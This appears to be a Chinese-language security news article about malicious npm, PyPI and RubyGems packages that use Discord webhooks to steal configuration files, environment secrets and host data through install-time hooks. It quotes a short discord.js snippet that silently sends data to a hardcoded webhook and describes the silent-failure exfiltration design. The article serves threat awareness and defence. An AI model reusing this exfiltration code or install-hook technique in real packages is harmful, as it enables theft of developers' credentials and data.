攻击者利用Discord Webhook通过npm、PyPI和Ruby软件包构建隐蔽C2通道

网络安全研究人员发现,网络犯罪分子正在利用Discord webhook作为替代性命令与控制(C2)通道,渗透主流编程语言生态系统。与传统C2服务器不同,webhook提供免费且隐蔽的数据外传渠道,能够完美隐藏在合法的HTTPS流量中。

过去一个月内,npm、PyPI和RubyGems平台上的恶意软件包已悄然窃取开发者设备和持续集成环境中的敏感文件及遥测数据。最早发现的案例是一个名为mysql-dumpdiscord 的npm模块,该模块看似无害,但在安装或执行时会扫描config[.]json[.]envayarlar[.]js等配置文件和环境文件,读取内容后通过HTTP POST发送至硬编码的Discord webhook URL。

攻击者控制的webhook以字符串常量形式嵌入代码,接收每个文件内容(超过1900字符的文件会被截断以适应Discord消息长度限制)。Socket.dev分析师是在网络监控发现发往discord[.]com/api/webhooks/...的POST请求异常激增后,才识别出这种攻击手法。

跨平台攻击手法

进一步调查发现第二个npm概念验证样本,该样本利用官方discord.js库实现攻击:

复制代码
const { WebhookClient } = require ('discord.js');
module.exports = async function send (messages) {
 try {
  const client = new WebhookClient ({ url: 'https://discord.com/api/webhooks/1323713674971713676/...' });
  await client.send (messages.join(' '));
 } catch (e) {
  // 静默失败
 }
};

这种极简设计将传入函数的任何字符串转化为C2消息,规避了基于主机的异常域名或签名检测。

攻击者在各生态系统采用相似手法。PyPI平台上的malinssx 软件包会重写setuptools中的install命令,在pip install执行时序列化越南语通知消息"Some just installed the maladicus package via pip!"并发送至Discord webhook。所有网络错误都会被捕获并忽略,正常安装流程不受影响。

RubyGems平台上被篡改的sqlcommenterrails 版本会收集主机元数据(包括/etc/passwd内容、DNS服务器、当前用户和公网IP),将其格式化为多行JSON载荷通过HTTPS POST发送至webhook。错误处理同样保持静默,确保gem安装过程不被中断。

感染机制分析

这些恶意软件包利用安装时钩子 实现持久化和隐蔽性。通过重写安装命令(Python的install[.]run、Ruby的gemspec钩子),恶意代码能在主机的安全控制检测到运行时行为前就执行。这种早期执行意味着敏感数据在代码分析或端点防护启动前就已外泄。

此外,利用Discord基础设施可规避静态白名单的怀疑------企业协作场景下discord[.]com的流量通常被允许,这使得受信域名变成了隐蔽的数据管道。

相关推荐
前端之虎陈随易4 小时前
编程语言级别的Skill市场,AI Agent 的未来形态
前端·vue.js·人工智能·typescript·node.js
一路向北he4 小时前
字节钢铁军团--“提供情境,而非控制”
java·开发语言·前端
kyriewen4 小时前
豆包和千问同时关了智能体,我用它们搭的 3 个自动化全废了——迁移方案整理
前端·javascript·ai编程
前端一小卒5 小时前
我用 TypeScript 从零手写了一个 Claude Code,然后发现它的核心只有 30 行
前端·agent
大圣编程6 小时前
Python中continue语句的用法是什么?
开发语言·前端·python
yuhaiqiang6 小时前
随手 vibecoding 的浏览器插件已经 6000 多次下载,聊聊他的产品设计
前端·后端·面试
之歆7 小时前
Vue商品详情与放大镜组件
前端·javascript·vue.js
再吃一根胡萝卜7 小时前
如何把小米 MiMo 接入 CodeBuddy,打造私有 Agent
前端
负责的蛋挞9 小时前
异步HttpModule的实现方式
java·服务器·前端